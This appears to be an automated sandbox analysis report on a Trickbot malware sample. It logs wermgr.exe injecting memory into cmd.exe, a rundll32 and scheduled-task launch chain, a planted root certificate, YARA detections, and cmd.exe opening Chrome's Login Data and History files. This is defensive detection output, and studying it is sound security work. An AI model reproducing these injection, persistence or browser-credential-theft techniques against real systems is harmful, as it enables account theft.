Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1800BA000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 140000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 150000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 260000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 140000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 260000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 280000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 290000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 4B0000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 49D790B4
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E70000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E70000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E70000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 180001000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 180001000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 18005D000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 18005D000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 180079000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 180079000

Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\iDownloadManager1882563550\kufndskfndszi.dwn',StartW

Source: wermgr.exe, 00000005.00000002.2370606855.0000000000860000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: wermgr.exe, 00000005.00000002.2370606855.0000000000860000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: wermgr.exe, 00000005.00000002.2370606855.0000000000860000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Windows\System32\wermgr.exe

Queries volume information: C:\ VolumeInformation

Source: C:\Windows\System32\taskeng.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\System32\wermgr.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

Stealing of Sensitive Information:

Yara detected Trickbot

Source: Yara match

File source: Process Memory Space: wermgr.exe PID: 1776, type: MEMORY

Yara detected Trickbot

Source: Yara match	File source: 00000004.00000002.2105353530.0000000002460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2104607915.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2104542682.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2460000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2460000.8.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History.bak
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality:

Yara detected Trickbot

Source: Yara match

File source: Process Memory Space: wermgr.exe PID: 1776, type: MEMORY

Yara detected Trickbot